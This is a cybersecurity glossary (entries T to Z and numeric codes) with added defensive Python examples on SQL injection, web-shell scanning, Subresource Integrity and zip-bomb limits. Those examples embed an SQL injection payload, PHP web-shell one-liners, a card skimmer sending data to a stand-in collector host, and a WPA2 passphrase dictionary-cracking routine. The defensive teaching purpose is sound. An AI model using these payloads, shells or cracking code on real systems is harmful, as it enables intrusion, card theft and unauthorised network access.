Two-factor Authentication - A type of multi-factor authentication used to confirm the identity of a user. Authentication is validated by using a combination of two different factors including: something you know (e.g. a password), something you have (e.g. a physical token), or something you are (a biometric).

Two-step Verification - A process requiring two different authentication methods, which are applied one after the other, to access a specific device or system. Unlike two-factor authentication, two-step verification can be of the same type (e.g. two passwords, two physical keys, or two biometrics). Also known as Two-step authentication.

Typhoid adware - This is a cyber security threat that employs a Man-in-the-middle attack in order to inject advertising into certain web pages a user visits while using a public network, like a public, non-encrypted WiFi hotspot. In this case, the computer being used doesn’t need to have adware on it, so installing a traditional antivirus can’t counteract the threat. While the ads themselves can be non-malicious, they can expose users to other threats. For example, the ads could promote a fake antivirus that is actually malware or a phishing attack.

Typosquatting - A sting site, or a fake URL, is a form of cybersquatting, and possibly brandjacking which relies on mistakes such as typos made by Internet users when inputting a website address into a web browser.

Unauthorized Access - When someone gains unauthorized access it means that they’ve illegally or illegitimately accessed protected or sensitive information without permission.

Unpatched Application - A supported application that does not have the latest security updates and/or patches installed.

Unauthorized Disclosure - This happens when sensitive, private information is communicated or exposed to parties who are not authorized to access the data.

Unicode - Unicode is an international encoding standard for use with different languages and scripts in which each letter, digit, or symbol is assigned a unique numeric value that applies across different platforms and programs. Hackers change unicode on their fraudulent sites and make it almost impossible to identify without carefully inspecting the site's URL or SSL certificate.

Unlimited [ Service Name Here ] - There is no such thing as unlimited services, disk space amount or monthly bandwidth. The statement is a sales gimmick. The hard disk hosting your content might be 10 terabytes at most. The provider says unlimited knowing you will never use that amount of data unless you're a corporation.

Uptime - Uptime is a measure of system reliability, expressed as the percentage of time a machine, typically a computer, has been working and available. Uptime is the opposite of downtime.

URL Hijacking - Refers to taking advantage of common typos users make when entering a Web address (URL) into their browser. A domain name that is a misspelled version of a popular domain name is legally registered.

URL Injection - A URL (or link) injection is when a cyber criminal creates new pages on a website owned by someone else, containing spammy words or links. Sometimes, these pages also contain malicious code that redirects your users to other web pages or makes the website's web server contribute to a DDoS attack. URL injection usually happens because of vulnerabilities in server directories or software used to operate the website, such as an outdated WordPress installation or plugins.

Virtual Private Network - A virtual private network extends a private network across a public network, and enables users to send and receive data across shared or public networks as if their computing devices were directly connected to the private network.

Virtual Private Server - A virtual private server is a virtual machine sold as a service by an Internet hosting service. The term virtual dedicated server has a similar meaning.

Virus - A computer program that can spread by making copies of itself. Computer viruses spread from one computer to another, usually without the knowledge of the user. Viruses can have harmful effects, ranging from displaying irritating messages to stealing data or giving other users control over the infected computer.

Virus Hoax - A computer virus hoax is a message that warns about a non-existent computer virus threat. This is usually transmitted via email, and tells the recipients to forward it to everyone they know. Computer hoaxes are usually harmless, but their intent is not innocent, since they exploit lack of knowledge, concern or ability to investigate before taking the action described in the hoax.

Vishing - Vishing (short for Voice over IP phishing) is a form of phishing performed over the telephone or voice over IP (VoIP) technology, such as Skype. Unsuspecting victims are duped into revealing sensitive or personal information via telephone calls, VoIP calls or even voice mail.

Voice Sniffing - Voice sniffing is when a voice assistant listens to conversations for words that indicate an interest in some type of activity, which can be used for advertising purposes. It is similar to "eavesdropping" but applies to voice assistants, such as Alexa, Google, and Siri.

Vulnerability - A flaw or weakness in the design or implementation of an information system or its environment that could be exploited to adversely affect an organization's assets or operations.

Vulnerability Assessment - A process to determine existing weaknesses or gaps in an information system's protection efforts.

Wabbits - A wabbit is one of four main classes of malware, alongside viruses, worms and Trojan horses. It's a form of computer program that repeatedly replicates on the local system. Wabbits can be programmed to have malicious side effects. A fork bomb is an example of a wabbit: it's a form of DoS attack against a computer that uses the fork function. A fork bomb quickly creates a large number of processes, eventually crashing the system. Wabbits don't attempt to spread to other computers across a network.

WannaCry - WannaCry is a ransomware cryptoworm which targeted computers running the Microsoft Windows operating system by encrypting data and demanding ransom payments in the Bitcoin cryptocurrency.

War Driving - Act of searching for Wi-Fi wireless networks by a person usually in a moving vehicle, using a laptop or smartphone. Software for wardriving is freely available on the internet. Warbiking, warcycling, warwalking and similar use the same approach but with other modes of transportation.

Watering Hole - Watering Hole is the name of a computer attack strategy that was detected as early as 2009 and 2010. The victim is a particular, very targeted group, such as a company, organization, agency, industry, etc. The attacker spends time to gain strategic information about the target: observes which legitimate websites are more often visited by the members of the group. Then the attacker exploits a vulnerability and infects one of those trusted websites with malware, without the knowledge of the site's owner. Eventually, someone from that organization will fall into the trap and get their computer infected. This way, the attacker gains access to the target's entire network. These attacks work because of the constant vulnerabilities in website technologies, even with the most popular systems, such as WordPress, making it easier than ever to stealthily compromise websites.

Web Bug - A web bug, also called a web beacon or pixel tag, is a small, transparent GIF image, usually not bigger than 1 pixel. It's embedded in an email or webpage and is usually used in connection with cookies. Web bugs are designed to monitor your activity and they load when you open an email or visit a website. Most common uses are marketing-related: for email tracking (to see if readers are opening the emails they receive, when they open them), web analytics (to see how many people visited a website), advertisement statistics (to find out how often an ad appears or is being viewed), IP addresses gathering, type of browser used.

Web Content Filtering - A web content filtering software is a program that will screen an incoming web page and restrict or control its content. It is used by governments that can apply them for censorship, by ISPs to block copyright infringement, by employers to sometimes block personal email clients or social media networks, by a school, by parents, etc. This software can block pages that include copyright infringement material, pornographic content, social networks, etc.

Webattacker - Webattacker is a do-it-yourself malware creation kit that demands minimal technical knowledge to be manipulated and used. It includes scripts that simplify the task of infecting computers and spam-sending techniques.

Web Injection - A class of attacks in which attacker-controlled input is inserted into a program, query or web page and interpreted as code rather than as data. Depending on where the injection lands, the attacker can execute remote commands, read or modify a database (SQL injection), alter what a web site shows to other users, or deliver malware to visitors. The general defence is to keep code and data separate, for example with parameterised queries and context-aware output encoding.
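As an added example (not part of this glossary), the two versions of the same login check below show the difference between splicing user input into a query and passing it as a parameter. It runs in Python against an in-memory SQLite database; the table, the users and the payload are constructed for the demonstration.

```python
"""SQL injection: vulnerable vs parameterised query (added example).
Runs against an in-memory SQLite database built inline."""
import sqlite3


def make_db() -> sqlite3.Connection:
    # Constructed sample data; a real table would hold password hashes, not plaintext.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("alice", "s3cret"), ("bob", "hunter2")])
    return conn


def login_vulnerable(conn: sqlite3.Connection, name: str, password: str) -> bool:
    # Untrusted input becomes part of the SQL text, so the attacker can change
    # the query's structure, not just the values being compared.
    sql = (f"SELECT COUNT(*) FROM users WHERE name = '{name}' "
           f"AND password = '{password}'")
    return conn.execute(sql).fetchone()[0] > 0


def login_safe(conn: sqlite3.Connection, name: str, password: str) -> bool:
    # Placeholders keep the statement fixed; the driver passes the values
    # separately, so a quote in the input is just a character in the data.
    sql = "SELECT COUNT(*) FROM users WHERE name = ? AND password = ?"
    return conn.execute(sql, (name, password)).fetchone()[0] > 0


# Classic tautology payload. In the vulnerable query the WHERE clause becomes
#   name = 'alice' AND password = '' OR '1'='1'
# which is true for every row because AND binds tighter than OR.
PAYLOAD = "' OR '1'='1"


def compare() -> dict:
    """Run both implementations with a genuine password and with the payload."""
    conn = make_db()
    return {
        "vulnerable/legit": login_vulnerable(conn, "alice", "s3cret"),
        "vulnerable/payload": login_vulnerable(conn, "alice", PAYLOAD),
        "safe/legit": login_safe(conn, "alice", "s3cret"),
        "safe/payload": login_safe(conn, "alice", PAYLOAD),
    }


if __name__ == "__main__":
    for case, logged_in in compare().items():
        print(f"{case:20} logged_in={logged_in}")
```

The parameterised version is not merely escaping quotes: the statement text never changes, so there is nothing for the input to break out of. The same principle applies to command injection (argument arrays instead of shell strings) and to HTML injection (encoding for the output context).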

Web Shells - A web shell is a malicious script (PHP, ASP, JSP and the like) that an attacker places on an already compromised web server so that commands carried in ordinary HTTP requests are executed on the host. Its purpose is to maintain persistent access and escalate from there; a web shell cannot by itself exploit a remote vulnerability, so it is always the second step of an attack and counts as post-exploitation tooling.
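Because a web shell is just a script sitting in the web root, finding one is largely a matter of looking for request data flowing into code-execution functions. The scanner below is an added example, not code from this glossary or any product; its indicator list, scoring and threshold are illustrative choices, and the three PHP files it scans are constructed samples. It also decodes base64-looking string literals so that a payload hidden inside one is inspected in the clear.

```python
"""Heuristic web-shell scanner for PHP sources (added example).
Indicators and scoring are illustrative choices, not a vetted ruleset."""
import base64
import re

# Functions that hand a string to the interpreter or the operating system.
DANGEROUS_CALL = re.compile(
    r"\b(eval|assert|system|passthru|shell_exec|exec|popen|proc_open)\s*\(", re.I)
# Request data: the raw material a shell feeds to those functions.
USER_INPUT = re.compile(r"\$_(GET|POST|REQUEST|COOKIE|FILES)\b")
# Wrappers used to keep the payload out of plain-text grep.
OBFUSCATION = re.compile(
    r"\b(base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I)
# Quoted literals that look like base64 (8+ characters of the base64 alphabet).
B64_LITERAL = re.compile(r"[\"']([A-Za-z0-9+/=]{8,})[\"']")


def decode_literals(src: str) -> str:
    """Decode base64-looking string literals so a payload hidden in one
    is scanned as plain text alongside the source."""
    decoded = []
    for literal in B64_LITERAL.findall(src):
        try:
            decoded.append(base64.b64decode(literal, validate=True)
                           .decode("utf-8", "ignore"))
        except ValueError:  # binascii.Error is a ValueError: not real base64
            continue
    return "\n".join(decoded)


def shell_score(src: str) -> int:
    """0 means nothing notable; 3 or more is worth a human look."""
    text = src + "\n" + decode_literals(src)
    score = 0
    if DANGEROUS_CALL.search(text):
        score += 2
    if USER_INPUT.search(text):
        score += 1
    if OBFUSCATION.search(src):
        score += 1
    # Strongest signal: request data on the same line as a dangerous call.
    if any(DANGEROUS_CALL.search(line) and USER_INPUT.search(line)
           for line in text.splitlines()):
        score += 2
    return score


def is_suspicious(src: str) -> bool:
    return shell_score(src) >= 3


# Constructed samples standing in for files found under a web root.
_HIDDEN = base64.b64encode(b"system($_GET['c']);").decode()
SAMPLES = {
    "contact.php": "<?php echo htmlspecialchars($_GET['name']); ?>",
    "oneliner.php": "<?php @eval($_POST['cmd']); ?>",
    "encoded.php": f'<?php eval(base64_decode("{_HIDDEN}")); ?>',
}


if __name__ == "__main__":
    for name, src in SAMPLES.items():
        print(f"{name}: score={shell_score(src)} suspicious={is_suspicious(src)}")
```

Pattern matching like this catches commodity shells, not a determined attacker; in practice it is combined with file-integrity monitoring of the web root (new or modified scripts) and with web-server logs showing POST requests to files that never receive them normally.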

Web Skimming - A form of Internet or carding fraud in which a payment page is compromised by injecting malicious JavaScript, typically by compromising a third-party script service the page loads, so that card details are copied to the attacker as the customer types them. Because the skimmer runs in the customer's browser on the legitimate site, neither the shop's servers nor the payment processor see anything unusual.
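One control against a compromised third-party script is Subresource Integrity (SRI): the page pins the expected hash of the script in an integrity attribute and the browser refuses to run a script whose bytes hash differently. The Python below is an added example, not part of this glossary; it reimplements the browser's check (including the rule that only the strongest algorithm listed counts) and audits a constructed page whose checkout script is pinned and whose analytics script is not. The URLs, script bodies and the appended skimmer are all made up for the demonstration.

```python
"""Subresource Integrity check for third-party scripts (added example).
Mirrors the browser rule: hash the fetched bytes and compare with the
integrity attribute; a skimmer appended to the script changes the hash."""
import base64
import hashlib
import re

ALGORITHMS = {"sha256": hashlib.sha256, "sha384": hashlib.sha384,
              "sha512": hashlib.sha512}
STRENGTH = {"sha256": 1, "sha384": 2, "sha512": 3}


def sri_hash(content: bytes, alg: str = "sha384") -> str:
    """Value for an integrity attribute, e.g. 'sha384-<base64 digest>'."""
    digest = ALGORITHMS[alg](content).digest()
    return f"{alg}-{base64.b64encode(digest).decode()}"


def verify_sri(content: bytes, integrity: str) -> bool:
    """Of the algorithms listed, only the strongest counts; pass if any
    digest of that algorithm matches the fetched bytes."""
    parsed = []
    for token in integrity.split():
        alg, _, value = token.partition("-")
        alg = alg.lower()
        if alg in ALGORITHMS and value:
            parsed.append((alg, value.split("?", 1)[0]))  # drop option suffix
    if not parsed:
        return False
    best = max(STRENGTH[alg] for alg, _ in parsed)
    alg = next(a for a, _ in parsed if STRENGTH[a] == best)
    expected = {v for a, v in parsed if STRENGTH[a] == best}
    return sri_hash(content, alg).split("-", 1)[1] in expected


def audit_page(html: str, fetched: dict) -> dict:
    """For each external <script>, report 'ok', 'blocked' (hash mismatch)
    or 'unpinned' (no integrity attribute, so SRI offers no protection)."""
    results = {}
    for tag in re.findall(r"<script\b[^>]*>", html, re.I):
        src = re.search(r'\bsrc="([^"]+)"', tag)
        if not src:
            continue  # inline script: SRI does not apply
        url = src.group(1)
        integrity = re.search(r'\bintegrity="([^"]+)"', tag)
        if not integrity:
            results[url] = "unpinned"
        elif verify_sri(fetched[url], integrity.group(1)):
            results[url] = "ok"
        else:
            results[url] = "blocked"
    return results


# Constructed scripts: the vetted version and a copy with a skimmer appended.
CLEAN_SCRIPT = (b"window.pay = function (card) { return fetch('/pay', "
                b"{method: 'POST', body: card}); };")
SKIMMED_SCRIPT = CLEAN_SCRIPT + (
    b"\nwindow.pay = (function (orig) { return function (card) {"
    b" new Image().src = 'https://collector.invalid/?c=' + encodeURIComponent(card);"
    b" return orig(card); }; })(window.pay);")

CHECKOUT_URL = "https://cdn.example/checkout.js"    # hypothetical, pinned
ANALYTICS_URL = "https://cdn.example/analytics.js"  # hypothetical, not pinned
PAGE = (f'<script src="{CHECKOUT_URL}" integrity="{sri_hash(CLEAN_SCRIPT)}"'
        f' crossorigin="anonymous"></script>\n'
        f'<script src="{ANALYTICS_URL}"></script>')


def demo(compromised: bool) -> dict:
    """Audit PAGE against what the CDN serves today."""
    served = {CHECKOUT_URL: SKIMMED_SCRIPT if compromised else CLEAN_SCRIPT,
              ANALYTICS_URL: b"/* analytics */"}
    return audit_page(PAGE, served)
```

Two caveats a practitioner will recognise: SRI only protects scripts that carry an integrity attribute (the unpinned analytics script above is exactly where a skimmer would go), and for cross-origin scripts the browser needs the crossorigin attribute and CORS headers from the CDN to perform the check at all. Pinning also means every legitimate update to the third-party script must be accompanied by an update to the hash.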

Whaling - A form of phishing whose objective is to collect sensitive data from high-value targets. It differs from ordinary phishing in going after high-profile, wealthy or powerful individuals such as celebrities, CEOs and other senior executives, with messages tailored to them. With the phished information, fraudsters can trick victims into revealing still more confidential data, extort them, or commit financial fraud such as authorising fraudulent transfers.

White Box Testing - Testing done with full knowledge of the target environment: source code, architecture and configuration. In software testing, white-box testing exercises the internal structure and workings of an application, as opposed to black-box testing, which examines only its externally visible functionality.

White Hat Hacker - Also known as ethical hackers: cybersecurity specialists, researchers or skilled enthusiasts who find security vulnerabilities in companies' systems and report them so that a fix can be issued. Unlike black-hat hackers, they do not use the vulnerabilities except to demonstrate them. Companies often hire white-hat hackers to test their defences (penetration testing). As demand for their skills has grown, white hats increasingly collect rewards for their findings through bug bounty programmes, ranging from $500 to $100,000 or more.

White Hat SEO - Any practice that improves a site's ranking on a search engine results page (SERP) while maintaining the integrity of the website and staying within the search engine's terms of service.

Whitelist - A list of e-mail addresses, domains or IP addresses that are explicitly trusted, for example senders whose mail is always delivered. It is the opposite of a blacklist of blocked senders. Spam filters use both, together with keyword rules, to decide whether a message is spam. More generally, a whitelist (allowlist) denies everything not on the list, which is the safer default for access control.

Windows Server - Windows Server is a brand name for a group of server operating systems released by Microsoft. It includes all Windows operating systems that are branded "Windows Server", but not any other Microsoft product. The first Windows server edition to be released under that brand was Windows Server 2003.

Wireless Fidelity - Wi-Fi: a local area network that uses radio signals in the 2.4 GHz and 5 GHz bands to send and receive data over distances of a few hundred feet, following the IEEE 802.11 family of standards rather than wired Ethernet (802.3). Also called a wireless local area network (WLAN).

Worm - A worm is self-replicating malware that spreads from one computer to another across a network on its own, typically by exploiting a vulnerability or weak credentials on the next host, without attaching itself to another program or waiting for a user to run it. The name comes from 1980s research at Xerox PARC into programs that copied themselves between machines to distribute computation; the 1988 Morris worm showed the same mechanism used destructively, and modern worms such as WannaCry spread the same way.

WPA - Wi-Fi Protected Access is a security protocol for wireless LANs introduced in 2003 as an interim replacement for WEP. It encrypts traffic with TKIP (a per-packet keying scheme that wrapped WEP's RC4 cipher so existing hardware could be upgraded) and adds a message integrity check. In WPA-Personal the keys derive from a pre-shared passphrase; in WPA-Enterprise network access is authenticated with IEEE 802.1X and the Extensible Authentication Protocol (EAP).

WPA2 - WPA2 is the successor to WPA and a security standard for wireless networks based on the Advanced Encryption Standard (AES), used in CCMP mode for both confidentiality and integrity. It is used with the IEEE 802.11a, 802.11b, 802.11g, 802.11n and 802.11ac Wi-Fi standards and has superseded WEP, which dates from the early days of wireless networking and has long been considered broken. WPA2-Personal derives the network key from the passphrase and the SSID, so a short or dictionary passphrase can be recovered offline by an attacker who captures a single connection handshake.
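The offline attack on WPA2-Personal follows directly from how the key is derived, which the added example below shows in Python (this is not code from the glossary or from any Wi-Fi tool). The pairwise master key is PBKDF2-HMAC-SHA1 over the passphrase with the SSID as salt, 4096 iterations, 32 bytes out; the passphrase/SSID test vector is the one published with the IEEE 802.11 passphrase-to-PSK mapping, while the network name "HomeNet-2G" and the five-word list are constructed stand-ins for a real SSID and a real wordlist.

```python
"""WPA2-Personal key derivation and why weak passphrases fall to an offline
dictionary attack (added example). Network name and wordlist are constructed."""
import hashlib
from typing import Iterable, Optional


def wpa2_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK (the PSK) = PBKDF2-HMAC-SHA1(passphrase, salt=SSID, 4096 rounds, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


# Reference vector from the IEEE 802.11 passphrase-to-PSK mapping.
REFERENCE = ("password", "IEEE",
             "f42c6fc52df0ebef9ebb4b90b38a5f902e83fe1b135a70e23aed762e9710a12e")


def matches_reference_vector() -> bool:
    passphrase, ssid, pmk_hex = REFERENCE
    return wpa2_pmk(passphrase, ssid).hex() == pmk_hex


def crack_pmk(target: bytes, ssid: str, wordlist: Iterable[str]) -> Optional[str]:
    """Offline guessing: derive the PMK for each candidate and compare.
    A real attack captures the 4-way handshake and checks each candidate
    against its MIC instead of against the PMK directly, but the cost per
    guess (4096 HMAC-SHA1 rounds) is the same, and nothing is sent to the AP."""
    for candidate in wordlist:
        if wpa2_pmk(candidate, ssid) == target:
            return candidate
    return None


# Constructed victim network and a short wordlist standing in for a real one.
SSID = "HomeNet-2G"
WORDLIST = ["password", "12345678", "letmein1", "sunshine", "qwertyui"]


def demo() -> dict:
    weak = wpa2_pmk("sunshine", SSID)
    strong = wpa2_pmk("v8Q!pL2#zr9Tn&wK", SSID)  # not in any wordlist
    return {
        "weak_recovered": crack_pmk(weak, SSID, WORDLIST),
        "strong_recovered": crack_pmk(strong, SSID, WORDLIST),
        # The SSID is the salt: the same passphrase yields a different PMK on
        # another network, so precomputed tables only work per SSID.
        "same_passphrase_other_ssid_differs":
            wpa2_pmk("sunshine", SSID) != wpa2_pmk("sunshine", "CoffeeShop"),
    }


if __name__ == "__main__":
    print("reference vector ok:", matches_reference_vector())
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Two consequences follow. The 4096 iterations slow each guess but cannot save an eight-character dictionary word against GPU cracking, so passphrase length and randomness are the only real defence in WPA2-Personal. And because common SSIDs ("linksys", "NETGEAR") share a salt, precomputed PMK tables exist for them, which is one more reason not to use a default network name.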

WPA3 - WPA3 (Wi-Fi Protected Access 3) is the third iteration of the Wi-Fi Alliance's security certification programme. WPA3-Personal replaces the pre-shared-key exchange with Simultaneous Authentication of Equals (SAE), a password-authenticated key exchange that resists offline dictionary attacks on captured handshakes and provides forward secrecy, so a later compromise of the passphrase does not expose earlier traffic. WPA3-Enterprise's 192-bit mode adds 256-bit Galois/Counter Mode Protocol (GCMP-256), 384-bit HMAC (HMAC-SHA384) for key derivation and 256-bit Broadcast/Multicast Integrity Protocol (BIP-GMAC-256).



XHTML - eXtensible HyperText Markup Language: a reformulation of HTML as well-formed XML, so that documents can be processed by standard XML parsers. It was promoted for network and portable devices, where a strict, predictable syntax is easier to handle than lenient HTML.

XML - Like HTML, XML uses tags to mark up a document so that software can interpret it. Unlike HTML, XML's tag set is unlimited (extensible): authors define their own tags, which describe the content rather than merely how to display it. Other languages such as RSS and MathML, and tools like XSLT, have been defined using XML.

XMPP - XMPP which stands for Extensible Messaging and Presence Protocol, is a communications protocol for messaging systems. It is based on XML, storing and transmitting data in that format. It is used for sending and receiving instant messages, maintaining buddy lists, and broadcasting the status of one’s online presence. XMPP is an open protocol standard. Anyone can operate their own XMPP service, and use it to interact with any other XMPP service. The standard is maintained by XSF, the XMPP Standards Foundation.

XMT - XMT is also called Transmit. XMT is the method of sending data to an alternate computer or device.

XNS - Xerox Network Systems (also expanded as Xerox Network Services): a proprietary suite of network protocols developed by Xerox in the late 1970s and 1980s. It is no longer used, having been displaced by TCP/IP (Transmission Control Protocol/Internet Protocol).



Y2K - Y2K is short for Year 2000 Bug or the millennium bug. Y2K is a warning first published by Bob Bemer in 1971 describing the issues of computers using a two-digit year date stamp.

Ymodem - A file-transfer protocol developed by Chuck Forsberg as an extension of the 1K variant of Xmodem. Ymodem sends data in 1024-byte blocks, supports batch transfer of multiple files with their names and sizes, uses a 16-bit cyclic redundancy check (CRC) for error detection, and can fall back to 128-byte blocks on poor connections.



Zero Day - A zero-day vulnerability is a software vulnerability that is not yet known by the vendor, and therefore has not been mitigated. A zero-day exploit is an attack directed at a zero-day vulnerability.

Zero Day Virus, Malware - A Zero Day virus, also known as Zero Day malware is a computer virus, Trojan horse or other malware, previously unknown by the software maker or by traditional antivirus producers. This means the vulnerability is also undisclosed publicly, though it might be known and quietly exploited by cyber attackers. Because it's not known yet, this means patches and antivirus software signatures are not yet available for it and there is little protection against an attack.

Zero Day Attack - A Zero Day (or Zero Hour or Day Zero) attack or threat is a computer threat that tries to exploit computer application vulnerabilities that are unknown to others or undisclosed to the software developer. Zero Day exploits (actual code that can use a security hole to carry out an attack) are used or shared by attackers before the software developer finds out about the vulnerability.

ZeuS, Zbot - Zeus, also known as Zbot, is a notorious banking Trojan that infects Windows users and harvests confidential information from infected machines. Once installed it downloads configuration files and updates from the Internet. Its purpose is to steal private data such as system information, passwords, banking credentials and other financial details; it could be customized to target banks in specific countries using a wide range of methods, including injecting extra fields into banking web pages as the victim views them. With the stolen credentials, criminals logged into victims' accounts and moved the money through networks of money mules, causing severe banking fraud. Operation Tovar, carried out in 2014, took down the command-and-control infrastructure of the GameOver Zeus variant, which had caused millions of dollars in damages and spread very quickly.

Zeus GameOver, Zeus P2P - Zeus GameOver is a variant of the ZeuS/Zbot family, the infamous financial-stealing malware, which relied on a peer-to-peer botnet infrastructure rather than fixed command-and-control servers, making it far harder to take down. Cyber criminals used it to collect financial information (credentials, credit card numbers, passwords, etc.) and any other personal information that could be used to access the victim's online banking accounts. GameOver Zeus is estimated to have infected about 1 million computers around the world; it was taken down in mid-2014 through Operation Tovar.

Zip Bomb - A zip bomb, also known as a zip of death or decompression bomb, is a malicious archive that is small when compressed (often only a few tens or hundreds of kilobytes) but expands to an enormous size when unpacked, exhausting disk space, memory or time and crashing the process or system. The classic form nests many layers of archives, each holding highly compressible data; some variants are zip quines that contain themselves and so unpack forever. They are often aimed at antivirus scanners and upload handlers that decompress archives automatically, so that the scanner is tied up or disabled and a conventional payload sent afterwards goes unexamined.
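Anything that unpacks user-supplied archives needs two defences: a cheap look at the central directory before extracting, and a hard cap on the bytes actually produced during extraction. The Python below is an added example, not code from this glossary; the 10 MiB cap and 100:1 ratio are policy choices shown for illustration, and the two archives it inspects (a small text report and 32 MiB of zeros, which deflate to a few tens of kilobytes) are built in memory for the demonstration.

```python
"""Decompression-bomb defences for zip uploads (added example): a cheap
check on the central directory before extraction, and a byte-counting
extractor that enforces the cap on real output. Limits are policy choices."""
import io
import zipfile

MAX_TOTAL_BYTES = 10 * 1024 * 1024  # accept at most 10 MiB of extracted data
MAX_RATIO = 100.0                   # declared/compressed above this is a red flag


def inspect_archive(data: bytes) -> dict:
    """Read only the central directory: declared sizes, ratio, nested archives."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        infos = [i for i in zf.infolist() if not i.is_dir()]
    compressed = sum(i.compress_size for i in infos)
    declared = sum(i.file_size for i in infos)
    ratio = declared / compressed if compressed else float("inf")
    nested = [i.filename for i in infos if i.filename.lower().endswith(".zip")]
    return {"entries": len(infos), "compressed": compressed,
            "declared": declared, "ratio": ratio, "nested": nested}


def safe_to_extract(data: bytes, max_total: int = MAX_TOTAL_BYTES,
                    max_ratio: float = MAX_RATIO) -> bool:
    """Pre-flight check. Nested archives are refused because a layered bomb
    keeps each individual layer's ratio modest."""
    info = inspect_archive(data)
    return (info["declared"] <= max_total and info["ratio"] <= max_ratio
            and not info["nested"])


def extract_bounded(data: bytes, max_total: int = MAX_TOTAL_BYTES,
                    chunk: int = 64 * 1024) -> dict:
    """Extract in chunks and count real output bytes; stop as soon as the cap
    is exceeded instead of trusting any size field in the archive."""
    out, total = {}, 0
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            buf = bytearray()
            with zf.open(info) as member:
                while piece := member.read(chunk):
                    total += len(piece)
                    if total > max_total:
                        raise ValueError(
                            f"output exceeded {max_total} bytes at {info.filename!r}")
                    buf.extend(piece)
            out[info.filename] = bytes(buf)
    return out


def extract_ok(data: bytes, max_total: int = MAX_TOTAL_BYTES) -> bool:
    """True if the archive extracts within the cap, False if it was cut off."""
    try:
        extract_bounded(data, max_total)
        return True
    except ValueError:
        return False


def make_zip(members: dict) -> bytes:
    """Build a constructed test archive in memory."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, content in members.items():
            zf.writestr(name, content)
    return buf.getvalue()


REPORT = b"\n".join(f"line {i}: revenue {i * 37 % 1000}".encode() for i in range(50))
BENIGN = make_zip({"report.txt": REPORT})
# 32 MiB of zeros deflates to a few tens of kilobytes: a ratio near 1000:1.
BOMB = make_zip({"payload.bin": bytes(32 * 1024 * 1024)})

if __name__ == "__main__":
    for name, data in (("benign", BENIGN), ("bomb", BOMB)):
        print(name, inspect_archive(data), "safe:", safe_to_extract(data),
              "extracted within cap:", extract_ok(data))
```

The pre-flight check is cheap and catches the obvious cases, but the byte count during extraction is the control that actually holds: header fields are attacker-supplied and some extraction libraries trust them, so the cap must be enforced on what comes out of the decompressor, and a per-file timeout is worth adding for the same reason.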

Zombie - A zombie is an Internet-connected computer that appears to be working normally but is controlled remotely by an attacker, typically through malware that connects out to a command-and-control server for instructions. Zombies are mostly used for malicious tasks such as sending spam, spreading malware to other computers or launching DoS (Denial of Service) attacks, without the owner's knowledge. A group of zombies under common control is a botnet.



0^s - For a positive integer s, 0^s is the string that consists of s consecutive 0 bits.

0^x - A string of x zero bits. For example, 0^5 = 00000.

0xA - Windows stop (blue screen) code 0x0000000A, IRQL_NOT_LESS_OR_EQUAL: usually a faulty kernel-mode driver. Check device drivers or services used by backup or antivirus utilities.

0xab - Hexadecimal notation that is used to define a byte (i.e., eight bits) of information, where a and b each specify four bits of information and have values from the range {0, 1, 2,…F}. For example, 0xc6 is used to represent 11000110, where c is 1100, and 6 is 0110.

0xD1 - Windows stop code 0x000000D1, DRIVER_IRQL_NOT_LESS_OR_EQUAL: check device drivers or services used by backup or antivirus utilities.

0x00 - An all-zero octet. Some specifications (for example NIST Recommendations) use it as the terminator of a variable-length data field that holds the ASCII code of a character string.

0x0X - 8-bit binary representation of the hexadecimal number X, for example, 0x02 = 00000010.

0x1E - Windows stop code 0x0000001E, KMODE_EXCEPTION_NOT_HANDLED: illegal or unknown instruction; check the driver referenced in the error message.

0x24 - Windows stop code 0x00000024, NTFS_FILE_SYSTEM: test the hard disk for errors.

0x2E - Windows stop code 0x0000002E, DATA_BUS_ERROR: test memory modules; disable memory caching in the system BIOS; check the hardware configuration.

0x50 - Windows stop code 0x00000050, PAGE_FAULT_IN_NONPAGED_AREA: commonly faulty RAM or a bad driver; check printer drivers.

0x7B - Windows stop code 0x0000007B, INACCESSIBLE_BOOT_DEVICE: incorrect or missing hard disk (storage controller) device driver.

0x7F - Windows stop code 0x0000007F, UNEXPECTED_KERNEL_MODE_TRAP: test hardware and RAM; check the SCSI configuration if in use; make sure the CPU is not overclocked.

0x9F - Windows stop code 0x0000009F, DRIVER_POWER_STATE_FAILURE: check power management and CD-writing software; disable power management temporarily; reinstall or upgrade CD-writing software.

0xC21A - Windows stop code 0xC000021A, STATUS_SYSTEM_PROCESS_TERMINATED (a critical user-mode process such as winlogon or csrss has exited): reinstall third-party programs; run System File Checker (sfc /scannow) to check system files.



1G - First Generation

1x - May refer to 1 times.

1.x - May refer to the version number.

1xx Informational response - An informational response indicates that the request was received and understood. It is issued on a provisional basis while request processing continues. It alerts the client to wait for a final response. The message consists only of the status line and optional header fields, and is terminated by an empty line. As the HTTP/1.0 standard did not define any 1xx status codes, servers must not send a 1xx response to an HTTP/1.0 compliant client except under experimental conditions.

100 Continue - The server has received the request headers and the client should proceed to send the request body (in the case of a request for which a body needs to be sent; for example, a POST request). Sending a large request body to a server after a request has been rejected for inappropriate headers would be inefficient. To have a server check the request's headers, a client must send Expect: 100-continue as a header in its initial request and receive a 100 Continue status code in response before sending the body. If the client receives an error code such as 403 (Forbidden) or 405 (Method Not Allowed) then it shouldn't send the request's body. The response 417 Expectation Failed indicates that the request should be repeated without the Expect header as it indicates that the server doesn't support expectations (this is the case, for example, of HTTP/1.0 servers).

101 Switching Protocols - The requester has asked the server to switch protocols and the server has agreed to do so.

102 Processing - A WebDAV request may contain many sub-requests involving file operations, requiring a long time to complete the request. This code indicates that the server has received and is processing the request, but no response is available yet. This prevents the client from timing out and assuming the request was lost.

103 Early Hints - Used to return some response headers before final HTTP message.



2TDEA - Two-key Triple Data Encryption Algorithm, as specified in NIST SP 800-67: TDEA with K1 = K3, giving an effective key length of 112 bits. NIST disallowed two-key TDEA for encryption after 2015 (SP 800-131A).

